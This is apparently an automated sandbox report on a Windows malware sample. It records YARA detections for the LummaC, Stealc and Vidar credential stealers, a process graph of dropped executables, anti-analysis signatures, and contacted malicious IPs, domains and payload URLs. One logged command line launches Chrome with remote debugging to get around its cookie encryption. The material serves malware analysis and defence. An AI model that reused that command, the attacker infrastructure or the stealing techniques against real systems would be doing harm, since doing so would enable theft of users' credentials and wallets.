Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Yara detected Credential Stealer
Source: Yara match File source: 0000000E.00000003.2695338579.000000000150D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.2754545310.0000000001522000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.2660335894.000000000150E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2130376795.0000000000CDC000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.2746364474.0000000001519000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000003.2810105120.00000000016DE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.2694420134.0000000001509000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.2695385436.0000000001519000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.2746298150.000000000150C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.2660487547.0000000001519000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.2719534998.0000000001519000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000003.2940443306.00000000016D4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.2659619178.000000000150D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.2718825525.0000000001519000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.2718722019.000000000150C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 7540, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 0718eb7837.exe PID: 6588, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 0718eb7837.exe PID: 7288, type: MEMORYSTR

Remote Access Functionality
barindex
Attempt to bypass Chrome Application-Bound Encryption
Source: C:\Users\user\Desktop\file.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default"
Yara detected Credential Flusher
Source: Yara match File source: Process Memory Space: 2922d7c574.exe PID: 4600, type: MEMORYSTR
Yara detected Cryptbot
Source: Yara match File source: dump.pcap, type: PCAP
Yara detected LummaC Stealer
Source: Yara match File source: Process Memory Space: 0718eb7837.exe PID: 6588, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 0718eb7837.exe PID: 7288, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Yara detected Stealc
Source: Yara match File source: 00000000.00000002.2129788119.000000000074E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.2912762087.0000000000E11000.00000040.00000001.01000000.00000010.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2737911561.0000000000E11000.00000040.00000001.01000000.00000010.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1709468423.0000000004B80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2743981437.000000000163E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000003.2825521059.00000000057C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.2919990948.0000000001AAB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000003.2687883624.0000000005150000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2130376795.0000000000C11000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 7540, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: aedbd2e320.exe PID: 5956, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: aedbd2e320.exe PID: 6520, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Yara detected Vidar stealer
Source: Yara match File source: Process Memory Space: file.exe PID: 7540, type: MEMORYSTR
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C640C40 sqlite3_bind_zeroblob, 0_2_6C640C40
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C640D60 sqlite3_bind_parameter_name, 0_2_6C640D60
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C568EA0 sqlite3_clear_bindings, 0_2_6C568EA0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C640B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob, 0_2_6C640B40
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C566410 bind,WSAGetLastError, 0_2_6C566410
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C56C050 sqlite3_bind_parameter_index,strlen,strncmp,strncmp, 0_2_6C56C050
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C566070 PR_Listen, 0_2_6C566070
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C56C030 sqlite3_bind_parameter_count, 0_2_6C56C030
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5660B0 listen,WSAGetLastError, 0_2_6C5660B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C4F22D0 sqlite3_bind_blob, 0_2_6C4F22D0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5663C0 PR_Bind, 0_2_6C5663C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C569400 sqlite3_bind_int64, 0_2_6C569400
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5694C0 sqlite3_bind_text, 0_2_6C5694C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5694F0 sqlite3_bind_text16, 0_2_6C5694F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C569480 sqlite3_bind_null, 0_2_6C569480
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1561158 Sample: file.exe Startdate: 22/11/2024 Architecture: WINDOWS Score: 100 97 youtube.com 2->97 99 youtube-ui.l.google.com 2->99 101 30 other IPs or domains 2->101 131 Suricata IDS alerts for network traffic 2->131 133 Found malware configuration 2->133 135 Antivirus detection for URL or domain 2->135 137 17 other signatures 2->137 9 skotes.exe 4 29 2->9         started        14 file.exe 36 2->14         started        16 0718eb7837.exe 2->16         started        18 3 other processes 2->18 signatures3 process4 dnsIp5 115 185.215.113.43, 49782, 49789, 80 WHOLESALECONNECTIONSNL Portugal 9->115 117 31.41.244.11, 49794, 80 AEROEXPRESS-ASRU Russian Federation 9->117 79 C:\Users\user\AppData\...\2aff342b40.exe, PE32 9->79 dropped 81 C:\Users\user\AppData\...\2922d7c574.exe, PE32 9->81 dropped 83 C:\Users\user\AppData\...\aedbd2e320.exe, PE32 9->83 dropped 91 6 other malicious files 9->91 dropped 173 Creates multiple autostart registry keys 9->173 175 Hides threads from debuggers 9->175 177 Tries to detect sandboxes / dynamic malware analysis system (registry check) 9->177 20 0718eb7837.exe 9->20         started        24 2aff342b40.exe 9->24         started        26 aedbd2e320.exe 9->26         started        36 2 other processes 9->36 119 185.215.113.206, 49730, 49750, 49760 WHOLESALECONNECTIONSNL Portugal 14->119 121 185.215.113.16, 49759, 80 WHOLESALECONNECTIONSNL Portugal 14->121 123 127.0.0.1 unknown unknown 14->123 85 C:\Users\user\DocumentsKECFIDGCBF.exe, PE32 14->85 dropped 87 C:\Users\user\AppData\...\softokn3[1].dll, PE32 14->87 dropped 89 C:\Users\user\AppData\Local\...\random[1].exe, PE32 14->89 dropped 93 12 other files (8 malicious) 14->93 dropped 179 Detected unpacking (changes PE section rights) 14->179 181 Attempt to bypass Chrome Application-Bound Encryption 14->181 183 Drops PE files to the document folder of the user 14->183 195 6 other signatures 14->195 28 cmd.exe 1 14->28         started        30 chrome.exe 14->30         started        185 Tries to harvest and steal ftp login credentials 16->185 187 Tries to harvest and steal browser information (history, passwords, etc) 16->187 189 Tries to steal Crypto Currency Wallets 16->189 191 Binary is likely a compiled AutoIt script file 18->191 193 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 18->193 32 firefox.exe 18->32         started        34 taskkill.exe 18->34         started        38 5 other processes 18->38 file6 signatures7 process8 dnsIp9 103 property-imper.sbs 172.67.162.84 CLOUDFLARENETUS United States 20->103 139 Antivirus detection for dropped file 20->139 141 Multi AV Scanner detection for dropped file 20->141 143 Detected unpacking (changes PE section rights) 20->143 161 2 other signatures 20->161 145 Tries to detect sandboxes and other dynamic analysis tools (window names) 24->145 147 Machine Learning detection for dropped file 24->147 149 Disables Windows Defender Tamper protection 24->149 163 2 other signatures 24->163 151 Tries to evade debugger and weak emulator (self modifying code) 26->151 153 Hides threads from debuggers 26->153 155 Tries to detect sandboxes / dynamic malware analysis system (registry check) 26->155 40 DocumentsKECFIDGCBF.exe 4 28->40         started        44 conhost.exe 28->44         started        105 192.168.2.4, 443, 49723, 49724 unknown unknown 30->105 107 239.255.255.250 unknown Reserved 30->107 46 chrome.exe 30->46         started        109 prod.classify-client.prod.webservices.mozgcp.net 35.190.72.216 GOOGLEUS United States 32->109 55 2 other processes 32->55 49 conhost.exe 34->49         started        111 fvtekk5pn.top 34.116.198.130 GOOGLE-AS-APGoogleAsiaPacificPteLtdSG United States 36->111 113 home.fvtekk5pn.top 36->113 157 Binary is likely a compiled AutoIt script file 36->157 159 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 36->159 51 chrome.exe 36->51         started        53 taskkill.exe 36->53         started        57 5 other processes 36->57 59 5 other processes 38->59 signatures10 process11 dnsIp12 77 C:\Users\user\AppData\Local\...\skotes.exe, PE32 40->77 dropped 165 Detected unpacking (changes PE section rights) 40->165 167 Tries to evade debugger and weak emulator (self modifying code) 40->167 169 Tries to detect virtualization through RDTSC time measurements 40->169 171 3 other signatures 40->171 61 skotes.exe 40->61         started        125 www.google.com 142.250.181.100, 443, 49734, 49735 GOOGLEUS United States 46->125 127 plus.l.google.com 172.217.17.78, 443, 49754 GOOGLEUS United States 46->127 129 apis.google.com 46->129 64 chrome.exe 51->64         started        67 conhost.exe 53->67         started        69 conhost.exe 57->69         started        71 conhost.exe 57->71         started        73 conhost.exe 57->73         started        75 conhost.exe 57->75         started        file13 signatures14 process15 dnsIp16 197 Antivirus detection for dropped file 61->197 199 Detected unpacking (changes PE section rights) 61->199 201 Machine Learning detection for dropped file 61->201 203 4 other signatures 61->203 95 www.google.com 64->95 signatures17
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
185.215.113.43
 unknown Portugal
206894 WHOLESALECONNECTIONSNL true
172.217.17.78
 plus.l.google.com United States
15169 GOOGLEUS false
185.215.113.16
 unknown Portugal
206894 WHOLESALECONNECTIONSNL false
142.250.181.100
 www.google.com United States
15169 GOOGLEUS false
172.67.162.84
 property-imper.sbs United States
13335 CLOUDFLARENETUS false
239.255.255.250
 unknown Reserved
unknown unknown false
185.215.113.206
 unknown Portugal
206894 WHOLESALECONNECTIONSNL true
34.116.198.130
 home.fvtekk5pn.top United States
139070 GOOGLE-AS-APGoogleAsiaPacificPteLtdSG false
35.190.72.216
 prod.classify-client.prod.webservices.mozgcp.net United States
15169 GOOGLEUS false
31.41.244.11
 unknown Russian Federation
61974 AEROEXPRESS-ASRU false

Private

IP
192.168.2.4
127.0.0.1

Contacted Domains

Name IP Active
example.org 93.184.215.14 true
star-mini.c10r.facebook.com 157.240.196.35 true
prod.classify-client.prod.webservices.mozgcp.net 35.190.72.216 true
prod.balrog.prod.cloudops.mozgcp.net 35.244.181.201 true
twitter.com 104.244.42.1 true
home.fvtekk5pn.top 34.116.198.130 true
prod.detectportal.prod.cloudops.mozgcp.net 34.107.221.82 true
plus.l.google.com 172.217.17.78 true
property-imper.sbs 172.67.162.84 true
dyna.wikimedia.org 185.15.58.224 true
prod.remote-settings.prod.webservices.mozgcp.net 34.149.100.209 true
fvtekk5pn.top 34.116.198.130 true
contile.services.mozilla.com 34.117.188.166 true
youtube.com 142.250.181.78 true
prod.content-signature-chains.prod.webservices.mozgcp.net 34.160.144.191 true
youtube-ui.l.google.com 172.217.19.206 true
us-west1.prod.sumo.prod.webservices.mozgcp.net 34.149.128.2 true
reddit.map.fastly.net 151.101.1.140 true
ipv4only.arpa 192.0.0.170 true
push.services.mozilla.com 34.107.243.93 true
prod.ads.prod.webservices.mozgcp.net 34.117.188.166 true
www.google.com 142.250.181.100 true
telemetry-incoming.r53-2.services.mozilla.com 34.120.208.123 true
www.reddit.com unknown unknown
spocs.getpocket.com unknown unknown
content-signature-2.cdn.mozilla.net unknown unknown
support.mozilla.org unknown unknown
firefox.settings.services.mozilla.com unknown unknown
www.youtube.com unknown unknown
www.facebook.com unknown unknown
detectportal.firefox.com unknown unknown
shavar.services.mozilla.com unknown unknown
apis.google.com unknown unknown
www.wikipedia.org unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://185.215.113.206/ false
    		high
    http://185.215.113.206/68b591d6548ec281/nss3.dll false
      		high
      http://home.fvtekk5pn.top/LCXOUUtXgrKhKDLYSbzW1732019347 false
        		high
        https://property-imper.sbs/api true
        • Avira URL Cloud: safe
        		 unknown
        https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw false
          		high